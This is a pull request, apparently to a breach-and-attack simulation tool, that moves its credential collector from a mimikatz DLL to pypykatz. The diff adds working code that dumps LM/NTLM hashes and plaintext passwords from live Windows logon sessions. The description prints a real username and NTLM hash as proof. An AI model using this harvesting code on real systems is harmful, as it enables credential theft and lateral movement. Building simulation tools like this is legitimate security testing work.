### PR TITLE
Migrating mimikatz.dll to pypykatz

### DIFF
--- a/monkey/infection_monkey/requirements.txt
+++ b/monkey/infection_monkey/requirements.txt
@@ -14,3 +14,4 @@ pywin32 ; sys_platform == 'win32'
 pymssql<3.0
 pyftpdlib
 WinSys-3.x
+pypykatz

--- a/monkey/infection_monkey/system_info/mimikatz_collector.py
+++ b/monkey/infection_monkey/system_info/mimikatz_collector.py
@@ -3,6 +3,7 @@ import ctypes
 import logging
 import socket
 import zipfile
+import json
 
 import infection_monkey.config
 from common.utils.attack_utils import ScanStatus, UsageEnum
@@ -29,27 +30,21 @@ class MimikatzCollector(object):
     # Password to Mimikatz zip file
     MIMIKATZ_ZIP_PASSWORD = b'VTQpsJPXgZuXhX6x3V84G'
 
-    def __init__(self):
+    def __init__(self, mode='pypykatz'):
         self._config = infection_monkey.config.WormConfiguration
         self._isInit = False
         self._dll = None
         self._collect = None
         self._get = None
+        self._mode = mode if mode == 'pypykatz' else 'dll'
         self.init_mimikatz()
 
     def init_mimikatz(self):
         try:
-            with zipfile.ZipFile(get_binary_file_path(MimikatzCollector.MIMIKATZ_ZIP_NAME), 'r') as mimikatz_zip:
-                mimikatz_zip.extract(self.MIMIKATZ_DLL_NAME, path=get_binaries_dir_path(),
-                                     pwd=self.MIMIKATZ_ZIP_PASSWORD)
-
-            self._dll = ctypes.WinDLL(get_binary_file_path(self.MIMIKATZ_DLL_NAME))
-            collect_proto = ctypes.WINFUNCTYPE(ctypes.c_int)
-            get_proto = ctypes.WINFUNCTYPE(MimikatzCollector.LogonData)
-            get_text_output_proto = ctypes.WINFUNCTYPE(ctypes.c_wchar_p)
-            self._collect = collect_proto(("collect", self._dll))
-            self._get = get_proto(("get", self._dll))
-            self._get_text_output_proto = get_text_output_proto(("getTextOutput", self._dll))
+            if self._mode == 'pypykatz':
+                self._init_pypykatz()
+            else:
+                self._init_dll()
             self._isInit = True
             status = ScanStatus.USED
         except Exception:
@@ -57,6 +52,75 @@ class MimikatzCollector(object):
             status = ScanStatus.SCANNED
         T1106Telem(status, UsageEnum.MIMIKATZ_WINAPI).send()
         T1129Telem(status, UsageEnum.MIMIKATZ).send()
+
+    def _init_pypykatz(self):
+        from pypykatz.pypykatz import pypykatz
+        mimi = pypykatz.go_live()
+        results = []
+
+        for luid in mimi.logon_sessions:
+            ls = mimi.logon_sessions[luid]
+            if len(ls.username) == 0:
+                continue
+            logon_data = self.LogonData()
+            logon_data.username = ls.username
+
+            for cred in ls.msv_creds:
+                t = cred.to_dict()
+                lm_hash = (ctypes.c_byte * self.LogonData.LM_NTLM_HASH_LENGTH)()
+                if t['LMHash']:
+                    for i in range(len(t['LMHash'])):
+                        lm_hash[i] = t['LMHash'][i]
+                ntlm_hash = (ctypes.c_byte * self.LogonData.LM_NTLM_HASH_LENGTH)()
+                if t['NThash']:
+                    for i in range(len(t['NThash'])):
+                        ntlm_hash[i] = t['NThash'][i]
+
+                logon_data.lm_hash = lm_hash
+                logon_data.ntlm_hash = ntlm_hash
+            
+            for cred in ls.wdigest_creds + ls.ssp_creds + ls.livessp_creds \
+                    + ls.kerberos_creds + ls.credman_creds + ls.tspkg_creds:
+                t = cred.to_dict()
+                if t['password'] is not None:
+                    logon_data.password = str(t['password'])
+                    break
+            results.append(logon_data)
+
+        def collect():
+            return len(results)
+
+        def get():
+            if len(results) != 0:
+                return results.pop()
+
+        def get_text_output():
+            output = []
+            for luid in mimi.logon_sessions:
+                output.append('\n'+str(mimi.logon_sessions[luid]))
+
+            if len(mimi.orphaned_creds) > 0:
+                output.append('\n== Orphaned credentials ==\n')
+                for cred in mimi.orphaned_creds:
+                    output.append(str(cred))
+            return ''.join(output)
+
+        self._collect = collect
+        self._get = get
+        self._get_text_output_proto = get_text_output
+
+    def _init_dll(self):
+        with zipfile.ZipFile(get_binary_file_path(MimikatzCollector.MIMIKATZ_ZIP_NAME), 'r') as mimikatz_zip:
+            mimikatz_zip.extract(self.MIMIKATZ_DLL_NAME, path=get_binaries_dir_path(),
+                                    pwd=self.MIMIKATZ_ZIP_PASSWORD)
+
+        self._dll = ctypes.WinDLL(get_binary_file_path(self.MIMIKATZ_DLL_NAME))
+        collect_proto = ctypes.WINFUNCTYPE(ctypes.c_int)
+        get_proto = ctypes.WINFUNCTYPE(MimikatzCollector.LogonData)
+        get_text_output_proto = ctypes.WINFUNCTYPE(ctypes.c_wchar_p)
+        self._collect = collect_proto(("collect", self._dll))
+        self._get = get_proto(("get", self._dll))
+        self._get_text_output_proto = get_text_output_proto(("getTextOutput", self._dll))
 
     def get_logon_info(self):
         """


### PR DESCRIPTION
# What is this? 
Fixes #583, for GSoC proposal

Add any further explanations here. 

## Checklist
* [x] Migrating mimikatz.dll to pypykatz

## Proof that it works
The `MimikatzCollector.get_logon_info` output on my machine ( Windows 10 ), it could dump the NTLM hash.
```
{'NEMESIS$': {}, 'UMFD-0': {}, 'LOCAL SERVICE': {}, 'Eddie_Ivan': {'ntlm_hash': '4f9099ea6ffad7906207dbc841ef13d4'}, 'UMFD-14': {}, 'DWM-14': {}}
```
May need to test on more OS.

